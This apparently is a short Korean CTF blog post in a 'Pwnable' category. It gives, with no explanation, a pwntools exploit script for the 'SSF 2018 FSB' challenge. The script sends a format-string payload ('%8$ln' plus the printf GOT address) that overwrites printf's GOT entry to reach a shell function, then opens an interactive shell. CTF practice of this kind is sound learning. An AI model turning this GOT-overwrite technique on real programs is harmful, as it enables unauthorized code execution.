SSF 2018 FSB

Pwnable 2021. 10. 17. 20:58

728x90
from pwn import *
context.log_level = 'debug'

p = process('./fsb')
e = ELF('./fsb')

shell = 4196006
printf_got = e.got['printf']

payload = "%4196006d"
payload += "%8$ln"
payload += "\x00"*2
payload += p64(printf_got)

p.sendline(payload)
p.interactive()
728x90

'Pwnable' 카테고리의 다른 글

SSF 2018 FSB  (0) 2021.12.30
Ropasaurusrex  (0) 2021.12.30
ROPASAURUSREX  (0) 2021.10.17
값 입력하고 바로 종료될때 메모리 값 보는방법  (0) 2021.10.05
SSTF 2021 - L0st Ark  (0) 2021.08.31